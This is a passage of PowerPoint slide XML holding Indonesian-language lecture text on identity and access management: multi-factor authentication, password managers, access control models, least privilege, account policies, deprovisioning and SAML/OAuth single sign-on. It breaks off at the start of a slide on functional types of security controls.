              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>notifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> push.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersyarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OAuth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1968436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Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Preventif-kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
